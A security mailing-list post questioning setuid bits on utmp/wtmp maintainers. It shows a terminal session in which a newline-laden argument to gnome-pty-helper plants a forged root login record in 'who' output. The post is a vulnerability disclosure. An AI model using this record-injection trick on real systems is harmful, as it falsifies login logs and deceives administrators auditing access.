I have not yet found any uses for utmp/wtmp: maybe Joey is right and there
is no security issue. I would then suggest that to increase security,
setuid/setgid bits be removed from all utmp/wmtp maintainers.
In the meantime, I hope that conscientious sysadmins do look at who and
last output occasionally; an expect that
[EMAIL PROTECTED]:~$ exploit "$(perl -e 'print "XX)\nroot tty01 Jan
01 02:03 (insecure.com"')" & sleep 1; who; sleep 6
[1] 22149
Writing utmp (who) record ...
utmp record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 22152
Sleeping for 5 secs...
psz pts/2 Oct 12 12:16 (XX)
root tty01 Jan 01 02:03 (insecure.com)
psz pts/1 Oct 12 11:37 (y622.yt.maths.usyd.edu.au:0.0)
[1]+ Done exploit "$(perl -e 'print "XX)\nroot tty01
Jan 01 02:03 (insecure.com"')"
[EMAIL PROTECTED]:~$
should suitably freak them out.
Cheers,
Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
